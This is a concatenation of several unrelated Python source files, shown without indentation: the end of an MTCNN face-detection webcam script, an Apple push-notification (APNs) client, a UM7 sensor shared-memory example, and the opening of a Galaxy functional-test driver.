factor_count += 1
# first stage
scales = [0.128, 0.08, 0.148, 0.4, 0.1]
tic()
for scale in scales:
hs = int(np.ceil(h*scale))
ws = int(np.ceil(w*scale))
if fastresize:
im_data = (img-127.5)*0.0078125 # [0,255] -> [-1,1]
im_data = cv2.resize(im_data, (ws,hs)) # default is bilinear
else:
im_data = cv2.resize(img, (ws,hs)) # default is bilinear
im_data = (im_data-127.5)*0.0078125 # [0,255] -> [-1,1]
#im_data = imResample(img, hs, ws); print "scale:", scale
im_data = np.swapaxes(im_data, 0, 2)
im_data = np.array([im_data], dtype = np.float)
PNet.blobs['data'].reshape(1, 3, ws, hs)
PNet.blobs['data'].data[...] = im_data
out = PNet.forward()
boxes = generateBoundingBox(out['prob1'][0,1,:,:], out['conv4-2'][0], scale, threshold[0])
if boxes.shape[0] != 0:
#print boxes[4:9]
#print 'im_data', im_data[0:5, 0:5, 0], '\n'
#print 'prob1', out['prob1'][0,0,0:3,0:3]
pick = nms(boxes, 0.5, 'Union')
if len(pick) > 0 :
boxes = boxes[pick, :]
if boxes.shape[0] != 0:
total_boxes = np.concatenate((total_boxes, boxes), axis=0)
#np.save('total_boxes_101.npy', total_boxes)
#####
# 1 #
#####
print("Pnet boxes:",total_boxes.shape[0])
print("Pnet time:")
toc()
#print total_boxes
#return total_boxes, []
tic()
numbox = total_boxes.shape[0]
if numbox > 0:
# nms
pick = nms(total_boxes, 0.7, 'Union')
total_boxes = total_boxes[pick, :]
#print("[2]:",total_boxes.shape[0])
# revise and convert to square
regh = total_boxes[:,3] - total_boxes[:,1]
regw = total_boxes[:,2] - total_boxes[:,0]
t1 = total_boxes[:,0] + total_boxes[:,5]*regw
t2 = total_boxes[:,1] + total_boxes[:,6]*regh
t3 = total_boxes[:,2] + total_boxes[:,7]*regw
t4 = total_boxes[:,3] + total_boxes[:,8]*regh
t5 = total_boxes[:,4]
total_boxes = np.array([t1,t2,t3,t4,t5]).T
#print "[3]:",total_boxes.shape[0]
#print regh
#print regw
#print 't1',t1
#print total_boxes
total_boxes = rerec(total_boxes) # convert box to square
#print("[4]:",total_boxes.shape[0])
total_boxes[:,0:4] = np.fix(total_boxes[:,0:4])
#print("[4.5]:",total_boxes.shape[0])
#print total_boxes
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
#print total_boxes.shape
#print total_boxes
numbox = total_boxes.shape[0]
if numbox > 0:
# second stage
#print 'tmph', tmph
#print 'tmpw', tmpw
#print "y,ey,x,ex", y, ey, x, ex,
#print "edy", edy
#tempimg = np.load('tempimg.npy')
# construct input for RNet
tempimg = np.zeros((numbox, 24, 24, 3)) # (24, 24, 3, numbox)
for k in range(numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]),3))
#print "dx[k], edx[k]:", dx[k], edx[k]
#print "dy[k], edy[k]:", dy[k], edy[k]
#print "img.shape", img[y[k]:ey[k]+1, x[k]:ex[k]+1].shape
#print "tmp.shape", tmp[dy[k]:edy[k]+1, dx[k]:edx[k]+1].shape
tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
#print "y,ey,x,ex", y[k], ey[k], x[k], ex[k]
#print "tmp", tmp.shape
tempimg[k,:,:,:] = cv2.resize(tmp, (24, 24))
#tempimg[k,:,:,:] = imResample(tmp, 24, 24)
#print 'tempimg', tempimg[k,:,:,:].shape
#print tempimg[k,0:5,0:5,0]
#print tempimg[k,0:5,0:5,1]
#print tempimg[k,0:5,0:5,2]
#print k
#print tempimg.shape
#print tempimg[0,0,0,:]
tempimg = (tempimg-127.5)*0.0078125 # done in imResample function wrapped by python
#np.save('tempimg.npy', tempimg)
# RNet
tempimg = np.swapaxes(tempimg, 1, 3)
#print tempimg[0,:,0,0]
RNet.blobs['data'].reshape(numbox, 3, 24, 24)
RNet.blobs['data'].data[...] = tempimg
out = RNet.forward()
#print out['conv5-2'].shape
#print out['prob1'].shape
score = out['prob1'][:,1]
#print 'score', score
pass_t = np.where(score>threshold[1])[0]
#print 'pass_t', pass_t
score = np.array([score[pass_t]]).T
total_boxes = np.concatenate( (total_boxes[pass_t, 0:4], score), axis = 1)
#print("[5]:",total_boxes.shape[0])
#print total_boxes
#print "1.5:",total_boxes.shape
mv = out['conv5-2'][pass_t, :].T
#print "mv", mv
if total_boxes.shape[0] > 0:
pick = nms(total_boxes, 0.7, 'Union')
#print 'pick', pick
if len(pick) > 0 :
total_boxes = total_boxes[pick, :]
#print("[6]:",total_boxes.shape[0])
total_boxes = bbreg(total_boxes, mv[:, pick])
#print("[7]:",total_boxes.shape[0])
total_boxes = rerec(total_boxes)
#print("[8]:",total_boxes.shape[0])
print("Rnet time:")
toc()
#####
# 2 #
#####
#print("2:",total_boxes.shape)
tic()
numbox = total_boxes.shape[0]
if numbox > 0:
# third stage
total_boxes = np.fix(total_boxes)
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
#print 'tmpw', tmpw
#print 'tmph', tmph
#print 'y ', y
#print 'ey', ey
#print 'x ', x
#print 'ex', ex
tempimg = np.zeros((numbox, 48, 48, 3))
for k in range(numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]),3))
tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
tempimg[k,:,:,:] = cv2.resize(tmp, (48, 48))
tempimg = (tempimg-127.5)*0.0078125 # [0,255] -> [-1,1]
# ONet
tempimg = np.swapaxes(tempimg, 1, 3)
ONet.blobs['data'].reshape(numbox, 3, 48, 48)
ONet.blobs['data'].data[...] = tempimg
out = ONet.forward()
score = out['prob1'][:,1]
points = out['conv6-3']
pass_t = np.where(score>threshold[2])[0]
points = points[pass_t, :]
score = np.array([score[pass_t]]).T
total_boxes = np.concatenate( (total_boxes[pass_t, 0:4], score), axis=1)
#print("[9]:",total_boxes.shape[0])
mv = out['conv6-2'][pass_t, :].T
w = total_boxes[:,3] - total_boxes[:,1] + 1
h = total_boxes[:,2] - total_boxes[:,0] + 1
points[:, 0:5] = np.tile(w, (5,1)).T * points[:, 0:5] + np.tile(total_boxes[:,0], (5,1)).T - 1
points[:, 5:10] = np.tile(h, (5,1)).T * points[:, 5:10] + np.tile(total_boxes[:,1], (5,1)).T -1
if total_boxes.shape[0] > 0:
total_boxes = bbreg(total_boxes, mv[:,:])
#print("[10]:",total_boxes.shape[0])
pick = nms(total_boxes, 0.7, 'Min')
#print pick
if len(pick) > 0 :
total_boxes = total_boxes[pick, :]
#print("[11]:",total_boxes.shape[0])
points = points[pick, :]
#####
# 3 #
#####
#print("3:",total_boxes.shape)
print("Onet time:")
toc()
return total_boxes, points
def initFaceDetector():
minsize = 20
caffe_model_path = "/home/duino/iactive/mtcnn/model"
threshold = [0.6, 0.7, 0.7]
factor = 0.709
caffe.set_mode_cpu()
PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
return (minsize, PNet, RNet, ONet, threshold, factor)
def haveFace(img, facedetector):
minsize = facedetector[0]
PNet = facedetector[1]
RNet = facedetector[2]
ONet = facedetector[3]
threshold = facedetector[4]
factor = facedetector[5]
if max(img.shape[0], img.shape[1]) < minsize:
return False, []
img_matlab = img.copy()
tmp = img_matlab[:,:,2].copy()
img_matlab[:,:,2] = img_matlab[:,:,0]
img_matlab[:,:,0] = tmp
#tic()
boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
#toc()
containFace = (True, False)[boundingboxes.shape[0]==0]
return containFace, boundingboxes
def start_process(p_list):
for i in range(len(p_list)):
p_list[i].start()
def join_process(p_list):
for i in range(len(p_list)):
p_list[i].join()
def detect_process(qin,qout):
minsize = 20
caffe_model_path = "./model"
threshold = [0.6, 0.7, 0.7]
factor = 0.08
caffe.set_mode_cpu()
PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
qout.put(('Initialized',None,None)) # signal main process that initialization has completed
while True:
if qin.empty():
continue
frame_gray, time_stamp = qin.get()
if time_stamp == 'Exit': break # When Exit is put into queue, the process should terminate
img = cv2.cvtColor(frame_gray, cv2.COLOR_GRAY2BGR)
img_matlab = img.copy()
tmp = img_matlab[:,:,2].copy()
img_matlab[:,:,2] = img_matlab[:,:,0]
img_matlab[:,:,0] = tmp
# check rgb position
#tic()
boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
qout.put((boundingboxes,points,time_stamp))
#toc()
def main():
process_num = 3 # define the number of processes running detection task
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH,320)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT,240)
boundingboxes = np.ndarray((0,9))
points = []
input_queue = Queue(5)
output_queue = Queue()
detect_p_list = []
for i in range(process_num):
detect_p_list.append(Process(target=detect_process,args=(input_queue,output_queue)))
detect_p_list[i].daemon = True
start_process(detect_p_list)
# wait for detection process's initialization
i = process_num
while i != 0:
if output_queue.get()[0] == 'Initialized': i -= 1
last_time = timer()
while True:
print('--------------------------------------')
#Capture frame-by-frame
__, frame = cap.read()
img_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
current_time = timer()
#sleep(0.01)# small delay to prevent overload
input_queue.put((img_gray,current_time))
if not output_queue.empty():
_boundingboxes, _points, ts = output_queue.get()
if ts - last_time > 0:
print("Detection FPS = {0}".format(1.0/(ts-last_time)))
boundingboxes = _boundingboxes
points = _points
last_time = ts
print(boundingboxes)
print(points)
print(last_time)
print("shape of boundingboxes:",boundingboxes.shape)
print("input_queue size:",input_queue.qsize())
print("output_queue size:",output_queue.qsize())
img = drawBoxes(frame, boundingboxes)
cv2.imshow('img', img)
print("Display FPS = {0}".format(1.0/(timer()-current_time)))
if cv2.waitKey(1) &0xFF == ord('q'):
break
#Terminate subprocesses
for i in range(process_num):
input_queue.put((None,'Exit',None))
join_process(detect_p_list)
#When everything's done, release capture
cap.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
client.py | import collections
import json
import logging
import time
import typing
import weakref
from enum import Enum
from threading import Thread
from typing import Dict, Iterable, Optional, Tuple, Union
from .credentials import CertificateCredentials, Credentials
from .errors import ConnectionFailed, exception_class_for_reason
# We don't generally need to know about the Credentials subclasses except to
# keep the old API, where APNsClient took a cert_file
from .payload import Payload
class NotificationPriority(Enum):
IMMEDIATE = '10'
DELAYED = '5'
class NotificationType(Enum):
ALERT = 'alert'
BACKGROUND = 'background'
VOIP = 'voip'
COMPLICATION = 'complication'
FILEPROVIDER = 'fileprovider'
MDM = 'mdm'
RequestStream = collections.namedtuple('RequestStream', ['stream_id', 'token'])
Notification = collections.namedtuple('Notification', ['token', 'payload'])
DEFAULT_APNS_PRIORITY = NotificationPriority.IMMEDIATE
CONCURRENT_STREAMS_SAFETY_MAXIMUM = 1000
MAX_CONNECTION_RETRIES = 3
logger = logging.getLogger(__name__)
class APNsClient(object):
SANDBOX_SERVER = 'api.development.push.apple.com'
LIVE_SERVER = 'api.push.apple.com'
DEFAULT_PORT = 443
ALTERNATIVE_PORT = 2197
def __init__(self,
credentials: Union[Credentials, str],
use_sandbox: bool = False, use_alternative_port: bool = False, proto: Optional[str] = None,
json_encoder: Optional[type] = None, password: Optional[str] = None,
proxy_host: Optional[str] = None, proxy_port: Optional[int] = None,
heartbeat_period: Optional[float] = None) -> None:
if isinstance(credentials, str):
self.__credentials = CertificateCredentials(credentials, password) # type: Credentials
else:
self.__credentials = credentials
self._init_connection(use_sandbox, use_alternative_port, proto, proxy_host, proxy_port)
if heartbeat_period:
self._start_heartbeat(heartbeat_period)
self.__json_encoder = json_encoder
self.__max_concurrent_streams = 0
self.__previous_server_max_concurrent_streams = None
def _init_connection(self, use_sandbox: bool, use_alternative_port: bool, proto: Optional[str],
proxy_host: Optional[str], proxy_port: Optional[int]) -> None:
server = self.SANDBOX_SERVER if use_sandbox else self.LIVE_SERVER
port = self.ALTERNATIVE_PORT if use_alternative_port else self.DEFAULT_PORT
self._connection = self.__credentials.create_connection(server, port, proto, proxy_host, proxy_port)
def _start_heartbeat(self, heartbeat_period: float) -> None:
conn_ref = weakref.ref(self._connection)
def watchdog() -> None:
while True:
conn = conn_ref()
if conn is None:
break
conn.ping('-' * 8)
time.sleep(heartbeat_period)
thread = Thread(target=watchdog)
thread.setDaemon(True)
thread.start()
def send_notification(self, token_hex: str, notification: Payload, topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.IMMEDIATE,
expiration: Optional[int] = None, collapse_id: Optional[str] = None) -> None:
stream_id = self.send_notification_async(token_hex, notification, topic, priority, expiration, collapse_id)
result = self.get_notification_result(stream_id)
if result != 'Success':
if isinstance(result, tuple):
reason, info = result
raise exception_class_for_reason(reason)(info)
else:
raise exception_class_for_reason(result)
def send_notification_async(self, token_hex: str, notification: Payload, topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.IMMEDIATE,
expiration: Optional[int] = None, collapse_id: Optional[str] = None,
push_type: Optional[NotificationType] = None) -> int:
json_str = json.dumps(notification.dict(), cls=self.__json_encoder, ensure_ascii=False, separators=(',', ':'))
json_payload = json_str.encode('utf-8')
headers = {}
inferred_push_type = None # type: Optional[str]
if topic is not None:
headers['apns-topic'] = topic
if topic.endswith('.voip'):
inferred_push_type = NotificationType.VOIP.value
elif topic.endswith('.complication'):
inferred_push_type = NotificationType.COMPLICATION.value
elif topic.endswith('.pushkit.fileprovider'):
inferred_push_type = NotificationType.FILEPROVIDER.value
elif any([
notification.alert is not None,
notification.badge is not None,
notification.sound is not None,
]):
inferred_push_type = NotificationType.ALERT.value
else:
inferred_push_type = NotificationType.BACKGROUND.value
if push_type:
inferred_push_type = push_type.value
if inferred_push_type:
headers['apns-push-type'] = inferred_push_type
if priority != DEFAULT_APNS_PRIORITY:
headers['apns-priority'] = priority.value
if expiration is not None:
headers['apns-expiration'] = '%d' % expiration
auth_header = self.__credentials.get_authorization_header(topic)
if auth_header is not None:
headers['authorization'] = auth_header
if collapse_id is not None:
headers['apns-collapse-id'] = collapse_id
url = '/3/device/{}'.format(token_hex)
stream_id = self._connection.request('POST', url, json_payload, headers) # type: int
return stream_id
def get_notification_result(self, stream_id: int) -> Union[str, Tuple[str, str]]:
"""
Get result for specified stream
The function returns: 'Success' or 'failure reason' or ('Unregistered', timestamp)
"""
with self._connection.get_response(stream_id) as response:
if response.status == 200:
return 'Success'
else:
raw_data = response.read().decode('utf-8')
data = json.loads(raw_data) # type: Dict[str, str]
if response.status == 410:
return data['reason'], data['timestamp']
else:
return data['reason']
def send_notification_batch(self, notifications: Iterable[Notification], topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.IMMEDIATE,
expiration: Optional[int] = None, collapse_id: Optional[str] = None,
push_type: Optional[NotificationType] = None) -> Dict[str, Union[str, Tuple[str, str]]]:
"""
Send a notification to a list of tokens in batch. Instead of sending a synchronous request
for each token, send multiple requests concurrently. This is done on the same connection,
using HTTP/2 streams (one request per stream).
APNs allows many streams simultaneously, but the number of streams can vary depending on
server load. This method reads the SETTINGS frame sent by the server to figure out the
maximum number of concurrent streams. Typically, APNs reports a maximum of 500.
The function returns a dictionary mapping each token to its result. The result is "Success"
if the token was sent successfully, or the string returned by APNs in the 'reason' field of
the response, if the token generated an error.
"""
notification_iterator = iter(notifications)
next_notification = next(notification_iterator, None)
# Make sure we're connected to APNs, so that we receive and process the server's SETTINGS
# frame before starting to send notifications.
self.connect()
results = {}
open_streams = collections.deque() # type: typing.Deque[RequestStream]
# Loop on the tokens, sending as many requests as possible concurrently to APNs.
# When reaching the maximum concurrent streams limit, wait for a response before sending
# another request.
while len(open_streams) > 0 or next_notification is not None:
# Update the max_concurrent_streams on every iteration since a SETTINGS frame can be
# sent by the server at any time.
self.update_max_concurrent_streams()
if next_notification is not None and len(open_streams) < self.__max_concurrent_streams:
logger.info('Sending to token %s', next_notification.token)
stream_id = self.send_notification_async(next_notification.token, next_notification.payload, topic,
priority, expiration, collapse_id, push_type)
open_streams.append(RequestStream(stream_id, next_notification.token))
next_notification = next(notification_iterator, None)
if next_notification is None:
# No tokens remaining. Proceed to get results for pending requests.
logger.info('Finished sending all tokens, waiting for pending requests.')
else:
# We have at least one request waiting for response (otherwise we would have either
# sent new requests or exited the while loop.) Wait for the first outstanding stream
# to return a response.
pending_stream = open_streams.popleft()
result = self.get_notification_result(pending_stream.stream_id)
logger.info('Got response for %s: %s', pending_stream.token, result)
results[pending_stream.token] = result
return results
def update_max_concurrent_streams(self) -> None:
# Get the max_concurrent_streams setting returned by the server.
# The max_concurrent_streams value is saved in the H2Connection instance that must be
# accessed using a with statement in order to acquire a lock.
# pylint: disable=protected-access
with self._connection._conn as connection:
max_concurrent_streams = connection.remote_settings.max_concurrent_streams
if max_concurrent_streams == self.__previous_server_max_concurrent_streams:
# The server hasn't issued an updated SETTINGS frame.
return
self.__previous_server_max_concurrent_streams = max_concurrent_streams
# Handle and log unexpected values sent by APNs, just in case.
if max_concurrent_streams > CONCURRENT_STREAMS_SAFETY_MAXIMUM:
logger.warning('APNs max_concurrent_streams too high (%s), resorting to default maximum (%s)',
max_concurrent_streams, CONCURRENT_STREAMS_SAFETY_MAXIMUM)
self.__max_concurrent_streams = CONCURRENT_STREAMS_SAFETY_MAXIMUM
elif max_concurrent_streams < 1:
logger.warning('APNs reported max_concurrent_streams less than 1 (%s), using value of 1',
max_concurrent_streams)
self.__max_concurrent_streams = 1
else:
logger.info('APNs set max_concurrent_streams to %s', max_concurrent_streams)
self.__max_concurrent_streams = max_concurrent_streams
def connect(self) -> None:
"""
Establish a connection to APNs. If already connected, the function does nothing. If the
connection fails, the function retries up to MAX_CONNECTION_RETRIES times.
"""
retries = 0
while retries < MAX_CONNECTION_RETRIES:
# noinspection PyBroadException
try:
self._connection.connect()
logger.info('Connected to APNs')
return
except Exception: # pylint: disable=broad-except
# close the connnection, otherwise next connect() call would do nothing
self._connection.close()
retries += 1
logger.exception('Failed connecting to APNs (attempt %s of %s)', retries, MAX_CONNECTION_RETRIES)
raise ConnectionFailed()
|
example_um7_latest_measurement_share_uart.py | #!/usr/bin/env python3
# Author: Dr. Konstantin Selyunin
# License: MIT
# Date: 28 March 2021
# NOTE: this only works with python3.8+ !
# Modified: 08 December 2021
import json
import logging
from pathlib import Path
import sys
from rsl_comm_py.um7_serial import UM7Serial
from rsl_comm_py.um7_broadcast_packets import UM7AllProcPacket, UM7AllRawPacket
from multiprocessing import shared_memory, Process, Lock
from time import sleep, time
BUFFER_SIZE = 1000
raw_data_shm = shared_memory.SharedMemory(create=True, size=BUFFER_SIZE)
proc_data_shm = shared_memory.SharedMemory(create=True, size=BUFFER_SIZE)
raw_lock = Lock()
proc_lock = Lock()
def sensor_read_process(raw_shm: shared_memory.SharedMemory, proc_shm: shared_memory.SharedMemory, r_lock: Lock, p_lock: Lock):
script_dir = Path(__file__).parent
device_file = script_dir.parent.joinpath("rsl_A500CNP8.json")
assert device_file.exists(), f"Device file with connection info: {device_file} does not exist!"
um7 = UM7Serial(device=device_file)
for packet in um7.recv_broadcast(flush_buffer_on_start=False):
packet_bytes = bytes(json.dumps(packet.__dict__), encoding='utf-8')
assert len(packet_bytes) <= BUFFER_SIZE, f"Packet cannot be serialized, increase `BUFFER` size at least up to {len(packet_bytes)}"
if isinstance(packet, UM7AllRawPacket):
r_lock.acquire()
raw_shm.buf[:] = b' ' * BUFFER_SIZE
raw_shm.buf[:len(packet_bytes)] = packet_bytes
r_lock.release()
# logging.warning(f"[SR][RAW] -> {packet}")
elif isinstance(packet, UM7AllProcPacket):
p_lock.acquire()
proc_shm.buf[:] = b' ' * BUFFER_SIZE
proc_shm.buf[:len(packet_bytes)] = packet_bytes
p_lock.release()
# logging.warning(f"[SR][PROC] -> {packet}")
def main_function():
start_time = time()
idx = 0
while time() - start_time < 60:
idx += 1
if idx % 2 == 0:
# imagine I need to process raw data now
raw_lock.acquire()
raw_meas_bytes: bytes = raw_data_shm.buf[:]
raw_lock.release()
raw_meas_str = str(raw_meas_bytes, encoding='utf-8')
raw_meas_dict = json.loads(raw_meas_str)
packet = UM7AllRawPacket(**raw_meas_dict)
logging.warning(f"[MF][RAW ]: {packet}")
sleep(3.0) # move motors, do some hard work
else:
# here I need ot handle proc data
proc_lock.acquire()
proc_meas_bytes: bytes = proc_data_shm.buf[:]
proc_lock.release()
proc_meas_str = str(proc_meas_bytes, encoding='utf-8')
proc_meas_dict = json.loads(proc_meas_str)
packet = UM7AllProcPacket(**proc_meas_dict)
logging.warning(f"[MF][PROC]: {packet}")
sleep(2.0) # move motors, do some hard work
if __name__ == '__main__':
logging.basicConfig(
level=logging.WARNING,
format='[%(asctime)s.%(msecs)03d]: %(message)s',
datefmt='%H:%M:%S',
handlers=[
logging.FileHandler(f'{Path(__file__).stem}.log', mode='w'),
logging.StreamHandler(sys.stdout),
])
sensor_read_proc = Process(target=sensor_read_process, args=(raw_data_shm, proc_data_shm, raw_lock, proc_lock,))
sensor_read_proc.start()
sleep(1)
main_function()
proc_data_shm.close()
proc_data_shm.unlink()
raw_data_shm.close()
raw_data_shm.unlink()
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import http.client
import logging
import os
import random
import re
import shlex
import shutil
import signal
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
from typing import Optional
from urllib.parse import urlparse
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.app_unittest_utils.celery_helper import rebind_container_to_task
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.database_utils import create_database, database_exists
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import GalaxyInteractorApi, verify_tool
from galaxy.util import asbool, download_to_file, galaxy_directory
from galaxy.util.properties import load_app_properties
from galaxy.webapps.galaxy import buildapp
from galaxy_test.base.api_util import get_admin_api_key, get_user_api_key
from galaxy_test.base.env import (
DEFAULT_WEB_HOST,
target_url_parts,
)
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
galaxy_root = galaxy_directory()
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
REALTIME_PROXY_TEMPLATE = string.Template(r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
# if interactive tool path, jump to interactive tool, else skip to
# endendend (default uwsgi params).
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
""")
DEFAULT_LOCALES = "en"
CAN_BUILD_ASGI_APP = sys.version_info[:2] >= (3, 7)
USE_UVICORN = asbool(os.environ.get('GALAXY_TEST_USE_UVICORN', CAN_BUILD_ASGI_APP))
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = os.path.realpath(tempfile.mkdtemp())
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directroy wher eht repositories are located cannot contain invalid url characters.
os.environ['TOOL_SHED_TEST_TMP_DIR'] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# no op remove if unused
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ['HTTP_ACCEPT_LANGUAGE'] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
"""Build a logger for test driver script."""
return log
def ensure_test_file_dir_set():
"""Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.
Return first directory for backward compat.
"""
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
return first_test_file_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
prefer_template_database=False,
log_format=None,
conda_auto_init=False,
conda_auto_install=False,
use_shared_connection_for_amqp=False,
allow_tool_conf_override: bool = True,
allow_path_paste=False,
):
"""Setup environment and build config for test Galaxy instance."""
# For certain docker operations this needs to be evaluated out - e.g. for cwltool.
tmpdir = os.path.realpath(tmpdir)
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
user_library_import_dir: Optional[str]
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = None
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
if os.path.exists(data_manager_config):
default_data_manager_config = data_manager_config
data_manager_config_file = 'test/functional/tools/sample_data_manager_conf.xml'
if default_data_manager_config is not None:
data_manager_config_file = f"{default_data_manager_config},{data_manager_config_file}"
master_api_key = get_admin_api_key()
cleanup_job = 'never' if ("GALAXY_TEST_NO_CLEANUP" in os.environ
or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ) else 'onsuccess'
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
if allow_tool_conf_override:
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
else:
tool_conf = default_tool_conf
conda_auto_install = os.environ.get('GALAXY_TEST_CONDA_AUTO_INSTALL', conda_auto_install)
